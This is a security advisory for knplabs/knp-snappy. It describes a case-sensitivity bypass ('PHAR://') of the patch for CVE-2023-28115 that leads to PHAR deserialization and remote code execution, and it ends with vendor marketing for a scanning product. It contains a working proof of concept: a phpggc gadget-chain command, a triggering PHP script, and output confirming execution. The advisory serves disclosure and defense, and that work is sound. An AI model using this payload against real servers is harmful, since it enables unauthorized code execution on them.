GHSA-92rv-4j2h-8mjj
CRITICALSnappy PHAR deserialization vulnerability
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
knplabs/knp-snappyReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects Packagist packages — download data is not available via public APIs for these ecosystems.
Description
Issue
On March 17th the vulnerability CVE-2023-28115 was disclosed, allowing an attacker to gain remote code execution through PHAR deserialization. To fix this issue, the version 1.4.2 was released with an additional check in the affected function to prevent the usage of the phar:// wrapper. However, because PHP wrappers are case-insensitive and the patch only checks the presence of the phar:// string, it can be bypassed to achieve remote code execution again using a different case.
As for the initial vulnerability, PHP 7 or below is required for a successful exploitation using the deserialization of PHP archives metadata via the phar:// wrapper.
Technical details
Description
The following patch was committed on the 1.4.2 release to fix CVE-2023-28115.
If the user is able to control the second parameter of the generateFromHtml() function of Snappy, it will then be passed as the $filename parameter in the prepareOutput() function. In the original vulnerability, a file name with a phar:// wrapper could be sent to the fileExists() function, equivalent to the file_exists() PHP function. This allowed users to trigger a deserialization on arbitrary PHAR files.
To fix this issue, the string is now passed to the strpos() function and if it starts with phar://, an exception is raised. However, PHP wrappers being case insensitive, this patch can be bypassed using PHAR:// instead of phar://.
Proof of Concept
To illustrate the vulnerability, the /tmp/exploit file will be written to the filesystem using a voluntarily added library to trigger the deserialization. The PHP archive is generated using phpggc with the -f option to force a fast destruct on the object. Otherwise, the PHP flow will stop on the first exception and the object destruction will not be called.
$ phpggc -f Monolog/RCE1 exec 'touch /tmp/exploit' -p phar -o exploit.phar
The following index.php file will be used to trigger the vulnerability via the payload PHAR://exploit.phar.
<?php
// index.php
// include autoloader
require __DIR__ . '/vendor/autoload.php';
// reference the snappy namespace
use Knp\Snappy\Pdf;
$snappy = new Pdf('/usr/local/bin/wkhtmltopdf');
$snappy->generateFromHtml('<h1>POC</h1>', 'PHAR://exploit.phar');
Finally once executed, the /tmp/exploit file is successfully created on the filesystem.
$ php index.php
Fatal error: Uncaught InvalidArgumentException: The output file 'PHAR://exploit.phar' already exists and it is a directory. in /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php:634
Stack trace:
#0 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php(178): Knp\Snappy\AbstractGenerator->prepareOutput('PHAR://exploit.phar', false)
#1 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/Pdf.php(36): Knp\Snappy\AbstractGenerator->generate(Array, 'PHAR://exploit.phar', Array, false)
#2 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php(232): Knp\Snappy\Pdf->generate(Array, 'PHAR://exploit.phar', Array, false)
#3 /var/www/index.php(12): Knp\Snappy\AbstractGenerator->generateFromHtml('<h1>POC</h1>', 'PHAR://exploit.phar')
#4 {main}
thrown in /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php on line 634
$ ls -l /tmp/exploit
-rw-r--r-- 1 user_exploit user_exploit 0 Jun 14 10:05 exploit
This proof of concept is based on the original one published with CVE-2023-28115.
Impact
A successful exploitation of this vulnerability allows executing arbitrary code and accessing the underlying filesystem. The attacker must be able to upload a file and the server must be running a PHP version prior to 8.
Patches
Synacktiv recommends to use a whitelist instead of a blacklist. In this situation, only the wrappers http://, https:// or file:// be available on the function generateFromHtml().
Workarounds
Control user data submitted to the function AbstractGenerator->generate(...)
References
https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc
Credits
Rémi Matasse of Synacktiv (https://synacktiv.com/).
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐘Packagist | knplabs/knp-snappy | all versions | 1.4.3 |
Research use only. For defensive security, authorized penetration testing, and academic research only. Never execute exploit code against systems without explicit written authorization.
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for knplabs/knp-snappy. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update knplabs/knp-snappy to 1.4.3 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-92rv-4j2h-8mjj is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-92rv-4j2h-8mjj is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-92rv-4j2h-8mjj. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-92rv-4j2h-8mjj in your dependencies?
O3 detects GHSA-92rv-4j2h-8mjj across Packagist dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.